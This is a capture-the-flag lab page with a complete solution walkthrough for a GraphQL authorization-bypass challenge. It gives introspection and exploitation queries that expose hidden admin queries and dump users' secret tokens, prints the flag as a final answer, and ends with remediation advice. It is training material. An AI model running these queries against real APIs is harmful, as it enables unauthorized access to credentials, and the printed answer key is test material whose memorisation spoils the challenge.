Avatar

Labs / GraphQL Gateway

  • Challenge
  • Released 12 Sep 2025

🚀 Can you unlock the secrets hidden in their GraphQL schema?

This company's modern GraphQL API promises flexible data access and powerful querying capabilities for their internal systems. 🔍 But with great power comes great responsibility - and their developers might have left a few doors unlocked. 💡 Dive deep into schema introspection, discover hidden queries, and exploit authorization flaws to uncover sensitive information that should never see the light of day! 🕵️

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🚀 GraphQL Gateway - Complete Solution

Objective: Exploit GraphQL schema introspection and authorization bypass vulnerabilities to access sensitive administrative data and retrieve the hidden flag.
🔍 Step 1: Access the GraphQL Playground

Navigate to /graphql in your browser to access the interactive GraphiQL interface. This provides a user-friendly environment for exploring the GraphQL API and crafting queries.

🔍 Step 2: Basic Schema Introspection

Start with basic schema introspection to discover the publicly available queries:

query BasicIntrospection {
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}

This reveals only 4 public queries: users, user, projects, and project. No administrative functions are visible yet.

🔍 Step 3: Deep Type Introspection Discovery

The key breakthrough comes from using deep type introspection to examine the Query type directly:

query DeepIntrospection {
  __type(name: "Query") {
    fields {
      name
      description
      args {
        name
        type { name }
      }
    }
  }
}

This deeper introspection reveals 7 total queries including 3 hidden administrative functions:

QueryTypeDescription
usersPublicGet users with optional role filter
userPublicGet single user by ID or username
projectsPublicGet projects with optional status filter
projectPublicGet single project by ID
adminUsersHidden AdminAdministrative query to get all users
classifiedProjectsHidden AdminAdministrative query to get classified projects
userSecretsHidden AdminAdministrative query to get user secrets
🔍 Step 3: Verify Regular User Access is Restricted

First, test the regular users query to confirm it properly filters administrative users:

query {
  users {
    id
    username
    role
    secret_token
  }
}

This returns only regular employees and contractors, properly excluding system administrators.

🔍 Step 4: Test Role-Based Filtering

Try to access admin users through the regular query with role filtering:

query {
  users(role: "admin") {
    id
    username
    role
    secret_token
  }
}

This correctly returns an empty array, confirming that the regular users query properly filters out administrative accounts.

🔍 Step 5: Authorization Bypass Exploitation

Now exploit the main vulnerability - the adminUsers query lacks proper authorization checks. Use this query to bypass all access controls:

query {
  adminUsers {
    id
    username
    role
    secret_token
  }
}

This unauthorized query returns all users in the system, including the system administrator account with role "system" that contains the flag in the secret_token field.

🔍 Step 6: Extract the Flag

From the adminUsers query results, locate the user with role "system" (typically the last user in the list). The flag is stored in their secret_token field:

FieldValueDescription
usernamesystem_adminSystem administrator account
rolesystemAdministrative role
secret_token1d25cb65-383f-4a56-bfe0-778f912a43fd🎯 This is the flag!
🎯 Final Answer
Flag: 1d25cb65-383f-4a56-bfe0-778f912a43fd
🔍 Alternative Discovery Methods

You could also discover the flag through other vulnerable queries exposed by introspection:

# Method 1: Direct admin query (primary method)
query { adminUsers { username role secret_token } }

# Method 2: User secrets query (if you know the admin user ID)
query { userSecrets(user_id: 5) }

# Method 3: Classified projects with nested user data
query { classifiedProjects { owner { secret_token } } }
📚 Key Vulnerabilities Exploited
  • Schema Introspection Enabled: Allows discovery of hidden administrative queries
  • Authorization Bypass: The adminUsers query lacks proper access control
  • Information Disclosure: Sensitive fields like secret_token are exposed without proper filtering
  • Excessive Data Exposure: Administrative queries return more data than necessary
🛡️ Security Recommendations
  • Disable Introspection: Turn off schema introspection in production environments
  • Implement Authorization: Add proper authorization checks to all resolver functions
  • Field-Level Security: Restrict access to sensitive fields based on user roles and permissions
  • Query Whitelisting: Only allow pre-approved queries in production
  • Rate Limiting: Implement query complexity analysis and rate limiting
  • Audit Logging: Log all GraphQL queries for security monitoring
Real-World Impact: This type of vulnerability is common in GraphQL APIs where developers focus on functionality over security. Always implement proper authorization at the resolver level and disable introspection in production environments.